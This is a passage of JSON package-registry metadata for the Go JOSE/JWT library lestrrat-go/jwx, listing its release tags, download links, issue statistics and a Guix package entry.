github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.200Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.082177034635306,"dependent_packages_count":5.700411654884096,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.891294344759701},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/internal/pool","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/pool","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/pool","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/internal/pool/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fpool/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fpool/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fpool/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fpool/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fpool/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fpool/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":13963829,"name":"go-github-com-lestrrat-go-jwx-v3","ecosystem":"guix","description":"Complete implementation of JWx in Golang","homepage":"https://github.com/lestrrat-go/jwx","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-03-02T22:58:55.184Z","latest_release_published_at":"2026-03-02T22:58:55.184Z","latest_release_number":"3.0.10","last_synced_at":"2026-04-07T02:00:22.408Z","created_at":"2026-03-02T22:58:54.973Z","updated_at":"2026-04-07T02:00:22.408Z","registry_url":"https://packages.guix.gnu.org/packages/go-github-com-lestrrat-go-jwx-v3/3.0.10/","install_command":"guix install go-github-com-lestrrat-go-jwx-v3","documentation_url":"https://git.savannah.gnu.org/cgit/guix.git/tree/gnu/packages/golang-web.scm#n8981","metadata":{"location":"gnu/packages/golang-web.scm:8981","variable_name":"go-github-com-lestrrat-go-jwx-v3"},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbo